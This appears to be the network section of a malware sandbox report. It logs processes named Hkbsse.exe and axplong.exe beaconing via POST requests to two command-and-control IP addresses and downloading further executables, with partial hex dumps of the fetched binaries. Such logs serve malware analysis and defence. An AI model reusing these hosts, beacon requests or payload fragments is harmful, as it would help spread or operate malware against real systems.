Sep 27, 2024 04:21:27.329700947 CEST	1236	IN	Data Raw: 77 42 dd e2 df e0 9e 76 0b d9 ca dd e1 df e0 9e d9 ca 77 30 dc fa 8d 8b 00 00 00 03 81 fb ff ff ff 00 77 20 dd e2 df e0 9e 0f 86 18 14 00 00 d9 ca dd e1 dd d9 df e0 9e d9 ee d9 c9 d9 ca 0f 86 03 14 00 00 dd d8 dd d8 89 cb b9 06 00 00 00 8b 44 24 Data Ascii: wBvw0w D$t\$D$XD$D$\|$L$$L$L$0T$<t5)D$8D$D-x u+tD$DD$EL$@p\$uD$\$7D
Sep 27, 2024 04:21:27.329714060 CEST	1236	IN	Data Raw: 8b 54 24 08 29 f2 83 e2 fc 8b 44 24 14 01 d0 01 d8 83 c0 04 89 ce 29 d6 89 f2 29 da 83 c2 fc eb 2f c7 44 24 0c 00 00 00 00 e9 4d 01 00 00 8b 5c 24 1c 85 c0 0f 85 39 02 00 00 e9 fc fe ff ff 89 c1 89 c3 e9 df 02 00 00 89 c6 8b 44 24 20 89 f2 85 d2 Data Ascii: T$)D$))/D$M\$9D$ \$t-Rj0PD$,T$L$T$ T$9t$$;L$~t$+t$t$$t$T$T$9\|L$t71\$ST$0F9uL$
Sep 27, 2024 04:21:27.329725981 CEST	1236	IN	Data Raw: 89 ce e8 a8 9e 00 00 8b 54 24 14 83 c4 0c 01 f7 89 de 8b 5c 24 1c 83 7d 08 00 0f 84 0f ff ff ff 89 f8 29 f0 3d ff 01 00 00 0f 8c 00 ff ff ff 01 44 24 4c 50 ff 75 0c 56 ff 55 08 83 c4 0c 85 c0 0f 84 8b 0a 00 00 89 c7 89 c6 8b 54 24 08 e9 dc fe ff Data Ascii: T$\$})=D$LPuVUT$L$4D$DL$EL$D$D )9\|}u(D$Dt$,1t$NL$B9u)t$,\$rPL$
Sep 27, 2024 04:21:27.329739094 CEST	1236	IN	Data Raw: 89 f8 29 f0 3d ff 01 00 00 0f 8c 10 ff ff ff 01 44 24 4c 50 ff 75 0c 56 ff 55 08 83 c4 0c 85 c0 0f 85 f5 fe ff ff e9 d2 05 00 00 89 c1 83 f8 04 0f 83 75 ff ff ff eb be 89 74 24 2c 8b 74 24 24 85 f6 0f 85 67 02 00 00 8b 4c 24 0c 85 c9 8b 74 24 2c Data Ascii: )=D$LPuVUut$,t$$gL$t$,OD$9D$D$8}t)9\|(L$8t$,1t$^\$B9u)t$,\$rRD$P
Sep 27, 2024 04:21:27.334589958 CEST	1236	IN	Data Raw: e3 03 8d 70 ff 39 f3 72 02 89 f3 8d 43 01 50 6a 20 57 e8 f0 94 00 00 83 c4 0c 01 df 47 29 de 8b 5c 24 1c 83 fe 04 7d 16 eb 48 90 90 90 90 90 90 90 90 90 90 90 90 90 89 de 83 fe 04 7c 34 89 f0 83 fe 07 7c 05 b8 07 00 00 00 f7 d8 8d 1c 06 83 c3 03 Data Ascii: p9rCPj WG)\$}H\|4\|CPj W)\$tVj Wt$,D$P}%!!)JD$LPuVUtYD$ED$D$P@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49741	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:26.877104998 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:27.591264963 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:27.999865055 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:28.237636089 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49742	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:28.448106050 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:29.179043055 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:29.180299997 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:29.419514894 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49744	185.215.113.16	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:28.761652946 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 33 31 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000314001&unit=246122658369
Sep 27, 2024 04:21:29.464981079 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Sep 27, 2024 04:21:29.466773987 CEST	58	OUT	GET /inc/newbundle2.exe HTTP/1.1 Host: 185.215.113.16
Sep 27, 2024 04:21:29.687958002 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:29 GMT Content-Type: application/octet-stream Content-Length: 311296 Last-Modified: Sun, 22 Sep 2024 20:59:29 GMT Connection: keep-alive ETag: "66f08531-4c000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 80 b6 e6 ea 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 ec 02 00 00 d0 01 00 00 00 00 00 d6 b9 02 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 b9 02 00 4f 00 00 00 00 20 03 00 c4 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 68 b9 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0 @ @O h H.text `.rsrc @@.reloc@B
Sep 27, 2024 04:21:29.687968969 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 b9 02 00 00 00 00 00 48 00 00 00 02 00 05 00 54 2d 01 00 1c 80 01 00 03 00 00 Data Ascii: HT-Mp01s,~%-&~ls-%(+o/8o0%rprYp~1(2
Sep 27, 2024 04:21:29.687979937 CEST	1236	IN	Data Raw: 0a 7e d7 02 00 04 25 2d 17 26 7e ce 02 00 04 fe 06 74 03 00 06 73 4f 00 00 0a 25 80 d7 02 00 04 28 06 00 00 2b 6f 65 01 00 06 00 11 07 11 06 fe 06 68 03 00 06 73 50 00 00 0a 7e d8 02 00 04 25 2d 17 26 7e ce 02 00 04 fe 06 75 03 00 06 73 51 00 00 Data Ascii: ~%-&~tsO%(+oehsP~%-&~usQ%(+ogisR~%-&~vsS%(+ok(+,dsm%o_%rp(>oa%sUoc%oi%ok%sV
Sep 27, 2024 04:21:29.688070059 CEST	672	IN	Data Raw: 11 07 11 07 6f 8c 01 00 06 28 4b 00 00 0a 2d 09 11 07 6f 8c 01 00 06 2b 05 72 fd 02 00 70 6f 8d 01 00 06 00 11 07 11 07 6f 8e 01 00 06 28 4b 00 00 0a 2d 09 11 07 6f 8e 01 00 06 2b 05 72 fd 02 00 70 6f 8f 01 00 06 00 11 07 11 07 6f 90 01 00 06 28 Data Ascii: o(K-o+rpoo(K-o+rpoo(K-o+rpoorp(b,ocXo:+*AdzJzR
Sep 27, 2024 04:21:29.688081980 CEST	1236	IN	Data Raw: 00 00 de 06 13 0a 00 00 de 00 11 07 2d 03 14 2b 07 11 07 28 81 01 00 06 28 4b 00 00 0a 16 fe 01 13 0b 11 0b 2c 09 06 11 07 6f 68 00 00 0a 00 00 11 06 17 58 13 06 11 06 11 05 6f 12 01 00 06 fe 04 13 0c 11 0c 3a a9 fe ff ff 00 de 05 26 00 00 de 00 Data Ascii: -+((K,ohXo:&+*AL`m-0sV%(`sa(\(],A
Sep 27, 2024 04:21:29.688095093 CEST	1236	IN	Data Raw: 00 00 2b 28 0c 00 00 2b 13 07 11 07 11 05 11 06 28 8c 00 00 06 0a 00 2b 10 00 02 16 14 28 14 00 00 06 6f 5e 00 00 0a 0a 00 00 de 06 13 08 00 00 de 00 06 13 09 2b 00 11 09 2a 00 01 10 00 00 00 00 07 00 ce d5 00 06 1a 00 00 01 1b 30 05 00 89 01 00 Data Ascii: +(+(+(o^+*0~1~1%rpoCiY(+(+8,Erp(v%s(`sa(\(],8X8,8
Sep 27, 2024 04:21:29.688106060 CEST	1236	IN	Data Raw: 06 0a 00 00 02 6f 86 00 00 0a 6f 88 00 00 0a 0b 38 ca 00 00 00 07 6f 89 00 00 0a 74 23 00 00 01 0c 00 08 6f 8a 00 00 0a 72 e3 03 00 70 28 8b 00 00 0a 0d 09 2c 0d 06 08 6f 8c 00 00 0a 6f 8d 01 00 06 00 08 6f 8a 00 00 0a 72 ed 03 00 70 28 8b 00 00 Data Ascii: oo8ot#orp(,ooorp(,orpo(oorp(,ooorp(,/(}ooooop(qoroo[:+u$
Sep 27, 2024 04:21:29.688116074 CEST	1236	IN	Data Raw: 06 6f 5e 00 00 0a 6f 7a 01 00 06 00 25 08 11 05 1f 09 6f 18 01 00 06 16 6f 3a 00 00 0a 1f 31 fe 01 6f 7c 01 00 06 00 25 08 11 05 18 6f 18 01 00 06 6f 5e 00 00 0a 6f 80 01 00 06 00 25 08 11 05 19 6f 18 01 00 06 6f 82 01 00 06 00 13 06 00 de 05 26 Data Ascii: o^oz%oo:1o\|%oo^o%oo&,ohXo:%&+*A4J{0~~1%{(`s
Sep 27, 2024 04:21:29.688127041 CEST	328	IN	Data Raw: 08 11 07 6f 5a 00 00 0a 00 dc 00 00 11 04 17 58 13 04 11 04 1a fe 04 13 17 11 17 3a a0 fd ff ff 00 de 05 26 00 00 de 00 06 0d 2b 00 09 2a 00 41 4c 00 00 00 00 00 00 1a 01 00 00 82 01 00 00 9c 02 00 00 05 00 00 00 13 00 00 01 02 00 00 00 f1 00 00 Data Ascii: oZX:&+AL"(0%(`sarp~1(2(mon((}or>&oo~%-
Sep 27, 2024 04:21:29.688678980 CEST	1236	IN	Data Raw: 02 8e 16 fe 01 2b 01 17 0a 06 2c 05 00 14 0b de 4f 02 04 03 28 9d 00 00 0a 0b de 44 0c 00 28 7d 00 00 0a 02 6f 72 00 00 0a 6f 6f 00 00 0a 7e dc 02 00 04 25 2d 17 26 7e da 02 00 04 fe 06 7a 03 00 06 73 9b 00 00 0a 25 80 dc 02 00 04 28 10 00 00 2b Data Ascii: +,O(D(}oroo~%-&~zs%(+,* !D03s(ono(rp~1o2+*0~18o_c_,
Sep 27, 2024 04:21:29.688921928 CEST	1236	IN	Data Raw: 0a 06 17 58 0b 2b 10 00 07 20 01 01 00 00 5a 0b 07 02 06 91 61 0b 00 06 17 59 25 0a 16 fe 04 16 fe 01 13 04 11 04 2d df 07 0d 2b 00 09 2a 00 13 30 02 00 1e 00 00 00 1b 00 00 11 00 02 14 fe 03 0a 06 2c 0f 00 02 6f ab 00 00 0a 74 1e 00 00 1b 0b 2b Data Ascii: X+ ZaY%-+0,ot++0,ot++&(zddddX%dX%dX%0b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49746	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:29.563450098 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:30.288439035 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:30.643394947 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:30.882782936 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49748	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:30.996032953 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:31.721355915 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:31.765674114 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:32.221024036 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49749	185.215.113.16	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:31.329678059 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 33 32 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000322001&unit=246122658369
Sep 27, 2024 04:21:32.022234917 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Sep 27, 2024 04:21:32.028491020 CEST	56	OUT	GET /inc/rstxdhuj.exe HTTP/1.1 Host: 185.215.113.16
Sep 27, 2024 04:21:32.247040987 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:32 GMT Content-Type: application/octet-stream Content-Length: 986112 Last-Modified: Tue, 24 Sep 2024 18:05:31 GMT Connection: keep-alive ETag: "66f2ff6b-f0c00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 27 31 f2 66 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 02 0f 00 00 08 00 00 00 00 00 00 82 21 0f 00 00 20 00 00 00 40 0f 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0f 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 21 0f 00 57 00 00 00 00 40 0f 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL'1f! @@ `(!W@`` H.text `.rsrc`@@@.reloc`@Bd!HPGU"(>(oV&.s0((o3(-j~%(~oj@8(so&o s!o",i-,o#($o%o&o#(((co'o'co'co'o'co'co'co'o(j+)o)nXbXdao*X
Sep 27, 2024 04:21:32.247054100 CEST	1236	IN	Data Raw: 11 04 11 09 33 d1 06 06 1c 62 58 0a 06 06 1f 16 64 61 0a 06 06 1f 1e 62 58 0a 06 0c 08 21 8a 76 3a 65 45 59 3b eb 61 0c 7e 01 00 00 04 08 6f 0e 00 00 06 08 13 0a de 08 11 0b 28 2b 00 00 0a dc 11 0a 2a 41 34 00 00 00 00 00 00 4d 00 00 00 0b 00 00 Data Ascii: 3bXdabX!v:eEY;a~o(+A4MX5-P}.(-0Ws,o-,o.+,o/+R(3-o(o.o0(1
Sep 27, 2024 04:21:32.247075081 CEST	1236	IN	Data Raw: 59 02 03 59 61 61 2a 1e 02 28 31 00 00 0a 2a 03 30 03 00 62 00 00 00 00 00 00 00 28 0b 00 00 06 20 92 0b 8b e0 66 66 65 66 65 65 66 66 65 65 66 61 d0 09 00 00 02 28 1a 00 00 0a 28 09 00 00 06 28 13 00 00 06 d0 0c 00 00 02 28 1a 00 00 0a 28 09 00 Data Ascii: YYaa(10b( ffefeeffeefa(((((((a Y7fefeffeef(((10B(((((((((((1(((
Sep 27, 2024 04:21:32.247085094 CEST	1236	IN	Data Raw: 3c 00 00 0a 2c 02 06 2a 02 17 28 35 00 00 06 2a 00 00 00 1b 30 05 00 af 08 00 00 0a 00 00 11 20 48 e7 95 75 0a 20 44 2f 52 5f 06 59 0b 14 13 05 2b 12 7e 09 00 00 04 02 12 05 6f 3c 00 00 0a 2c 03 11 05 2a 16 13 3d 7e 09 00 00 04 13 31 11 31 12 3d Data Ascii: <,(50 Hu D/R_Y+~o<,*=~11=(3~:()(!&)!~ 6>tXY`)s= ?OS?Yac(>(>& G?CaXc(>(>& TXa(>c(>& OOS
Sep 27, 2024 04:21:32.247097015 CEST	1236	IN	Data Raw: 42 00 00 0a 7e 0a 00 00 04 2c 09 7e 0a 00 00 04 13 16 2b 73 7e 0b 00 00 04 15 33 1c 7e 0c 00 00 04 6f 3c 00 00 06 20 7c d6 d1 63 06 61 07 58 61 11 17 61 68 13 25 2b 07 7e 0b 00 00 04 13 25 11 25 2d 05 14 13 16 2b 3f 7e 0c 00 00 04 11 25 6f 41 00 Data Ascii: B~,~+s~3~o< \|caXaah%+~%%-+?~%oA+$%G~_b_caRXi3~o=a QYYfefefeffefeaa X`3C~oA @YXab`b`b`e
Sep 27, 2024 04:21:32.247107983 CEST	1236	IN	Data Raw: 03 14 2b 1e 06 6f 2e 00 00 0a 25 2d 04 26 14 2b 11 6f 2f 00 00 0a 25 2d 04 26 14 2b 05 6f 1b 00 00 0a 0b 07 14 28 48 00 00 0a 2c 2d 07 28 36 00 00 06 0c 08 28 37 00 00 06 0d 09 2c 1c 09 8e 69 1e 33 16 09 16 91 20 b7 00 00 00 33 0c 09 1d 91 20 89 Data Ascii: +o.%-&+o/%-&+o(H,-(6(7,i3 3 3X%o-,Ao.%-&+o/%-&+o(H,(o(I,*0 i+{b% 3%X_,LcX
Sep 27, 2024 04:21:32.247119904 CEST	776	IN	Data Raw: 00 00 00 13 30 04 00 33 00 00 00 11 00 00 11 02 20 4e 88 53 fc 28 34 00 00 06 28 59 00 00 0a 0a 12 00 20 a8 88 53 fc 28 34 00 00 06 28 5a 00 00 0a 28 5b 00 00 0a 7d 22 00 00 04 02 28 31 00 00 0a 2a 00 8a 02 7b 22 00 00 04 28 5c 00 00 0a 75 50 00 Data Ascii: 03 NS(4(Y S(4(Z([}"(1{"(\uP%-&+(]u$J{"s^(_&sE(1.s~#~5*****************. S(4
Sep 27, 2024 04:21:32.247138977 CEST	1236	IN	Data Raw: 1e 00 00 01 28 aa 00 00 06 2a 00 3a 02 03 04 8c 2d 00 00 01 28 aa 00 00 06 2a 00 26 02 03 04 28 aa 00 00 06 2a 00 00 56 02 03 6f 70 00 00 0a 04 8c 06 00 00 01 28 aa 00 00 06 26 02 2a 00 00 42 02 03 6f 18 00 00 0a 04 28 aa 00 00 06 26 02 2a 00 00 Data Ascii: (:-(&(Vop(&Bo(&Vo-(&BoU(&0L{%(3 S(45%%({oq,(+*7@6(r(
Sep 27, 2024 04:21:32.247152090 CEST	1236	IN	Data Raw: 0a 6f 71 00 00 0a 07 6f 79 00 00 0a 2d dd de 0a 07 2c 06 07 6f 7a 00 00 0a dc 02 06 7d 32 00 00 04 2a 00 01 10 00 00 02 00 1a 00 27 41 00 0a 00 00 00 00 1e 02 7b 31 00 00 04 2a 1e 02 7b 32 00 00 04 2a f6 02 28 31 00 00 0a 02 03 25 2d 11 26 20 9b Data Ascii: oqoy-,oz}2'A{1{2(1%-& S(4sz}3%-& S(4sz}4{3{46u,(,((oo,(o(** ^((oX )UUZ(
Sep 27, 2024 04:21:32.247162104 CEST	1236	IN	Data Raw: 53 fc 28 34 00 00 06 02 7b a9 00 00 0a 28 ab 00 00 0a 2a 4a 02 28 6e 00 00 06 7d 45 00 00 04 02 28 31 00 00 0a 2a 00 56 73 31 00 00 0a 80 42 00 00 04 73 f6 00 00 06 80 44 00 00 04 2a 00 00 1a 7e 44 00 00 04 2a 00 1a 7e 43 00 00 04 2a 00 1b 30 02 Data Ascii: S(4{(J(n}E(1Vs1BsD~D~C0- S(4 S(4szu<, S(4 S(4sz~B(3~D{E3C~C,~D}EC,(+
